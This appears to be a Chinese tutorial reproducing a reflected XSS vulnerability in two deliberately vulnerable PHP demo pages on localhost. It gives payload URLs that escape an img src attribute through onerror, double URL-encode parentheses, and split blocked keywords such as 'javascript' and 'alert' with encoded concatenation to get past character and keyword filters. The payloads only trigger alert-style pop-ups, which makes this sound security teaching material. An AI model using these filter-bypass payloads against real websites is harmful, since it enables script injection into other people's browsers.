GET传递的参数直接输出在src中会存在反射型xss漏洞,本次复现的目的是利用url编码规则构造url绕过xss限制。
UrlEncode编码规则:将需要转码的字符的ASCII码值转为16进制,然后从右到左,取4位(不足4位直接处理),每2位做一位,前面加上%,编码成%XY格式。
通过分析源代码可知屏幕上打印图片路径来自于GET传递的参数,同时会将接收到参数中的()$<>'等字符均会被替换为空格。<>被过滤,闭合标签写入新标签不可行;&被过滤,使用&#的HTML实体编码不可行,因此使用url编码。
demo.php源代码
<?php
header('X-XSS-Protection: 0');
$xss = isset($_GET['xss'])? $_GET['xss'] : '';
$xss = str_replace(array("(",")","&","\\","<",">","'"), '', $xss);
echo "<img src=\"{$xss}\">";
?>
通过分析源代码可知屏幕上打印图片路径来自于GET传递的参数,同时会将接收到参数中的()$<>'等字符均会被替换为空格。<>被过滤,闭合标签写入新标签不可行;&被过滤,使用&#的HTML实体编码不可行,因此使用url编码。
构造url:
闭合双引号,逃逸出限制,利用GET传递一个不存在的参数和onerror函数来触发弹窗
127.0.0.1/demo.php?xss=b" onerror="alert(1)
使用url编码替换()
127.0.0.1/demo.php?xss=b" onerror="alert%281%29但浏览器会在提交数据时先进行一次转码,所以进入函数时%28%29又会被转换为()。我们需要让转码后的数据进入函数时保持在%28%29的状态,而%的url编码是%25,因此我们可以这样构建
127.0.0.1/demo.php?xss=b" onerror="alert%25281%2529
这样就会显示为
由上图还能得到%28,%29并没有被转换成括号,我们可以利用location'绕过这一限制。 location会将等号右边的所有值变成字符串变量,而变量在js中可以编码,相应的"alert()“替换为JavaScript的一个伪协议"javascript:alert()”,于是
http://127.0.0.1/css/net/demo.php?xss=b%22onerror=location=%22javascript:alert%25281%2529
demo1.php源代码
<?php
header('X-XSS-Protection: 0');
$xss = isset($_GET['xss'])?$_GET['xss']:'';
$xss = str_replace(array("(",")","&","\\","<",">","'"), '', $xss);
if (preg_match('/(script|document|cookie|eval|setTimeout|alert)/', $xss)) {
exit('bad');
}
echo "<img src=\"{$xss}\">";
?>
相比较这里多了alert还有script关键字限制
由于location会将等号右边的值转化为字符串,因此可以利用字符串可拼接的特性绕过关键字限制。
只有字母和数字[0-9a-zA-Z]、一些特殊符号“$-_.+!*'(),”[不包括双引号]、以及某些保留字,才可以不经过编码直接用于url。urlcode不识别加号,所以需要将+转化为%2b,这样在进入时才会被转换为+,返回时正确拼接。
构造的url如下:
http://127.0.0.1/css/net/demo1.php?xss=b%22onerror=location=%22javasc%22%2b%22ript:ale%22%2b%22rt%25281%2529
也可以将alert替换成confirm或者prompt
http://127.0.0.1/css/net/demo1.php?xss=b%22onerror=location=%22javasc%22%2b%22ript:confirm%25281%2529
811
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
